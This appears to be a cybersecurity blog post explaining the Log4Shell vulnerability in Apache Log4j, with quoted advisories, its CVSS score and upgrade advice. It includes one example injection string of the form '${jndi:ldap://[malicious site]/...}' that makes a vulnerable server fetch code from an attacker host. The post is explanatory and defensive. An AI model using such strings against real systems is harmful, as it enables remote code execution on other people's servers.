Zero-Day Exploits: Log4J

Cybersecurity
Written By Shasheen Bandodkar

LOG4J also referred to as "Log4shell," is a severe and critical zero-day vulnerability’s found widely in the Java logging library Apache Log4j which is used in many software solutions including Apache, Apple iCloud, Minecraft, etc, and is easy to exploit and enables attackers to gain unauthenticated, remote code execution, install crypto miners, allow botnet services to, etc. 

"Earliest evidence we've found so far of [the] Log4j exploit is 2021-12-01 04:36:50 UTC" according to Cloudflare CEO Matthew Prince. 

The Zero-day vulnerability is triggered when a specially crafted string supplied by a malicious actor through different input vectors is processed by the Log4J component. The string contains "jndi" which refers to the Java Naming and Directory Interface. Protocols, such as "ldap", "ldaps", "rmi", "dns", "iiop", or "http", precedes the attacker domain.

What is the Apache Log 4j2 JNDI Vulnerability?

From the NIST National Vulnerability Database: "Apache Log4j2 <=2.14.1 JNDI features used in the configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default.”


An Example of the attack would be:

${jndi:ldap://[malicious site]/<script>}
"The bulk of attacks that Microsoft has observed at this time has been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers." according to the Microsoft 365 Defender Threat Intelligence Team. 

The severe vulnerability has been scored a 10 on the CVSS score chart. 

What are the mitigation or remediation techniques?

It is important to upgrade the Apache Log from version 2.14.1 to version 2.15.0 immediately or as soon as possible.

As of today the latest version is 2.16.0 and it disables “jndi” by default.

Huntress Labs have created a tool to help you test whether your applications are vulnerable to CVE-2021-44228. "Please note that this tool is intended for testing purposes only and should only be used on systems you're authorized to test. If you find any vulnerabilities, please follow responsible disclosure guidelines." Link to the TOOL


A Compiled Log4j library resource from NCSC- NL.  GitHub 

References:

https://logging.apache.org/log4j/2.x/security.html

https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/

Shasheen Bandodkar
Previous

Basics of Identity and Access Management
Next

Can the metaVerse be cyberattacked?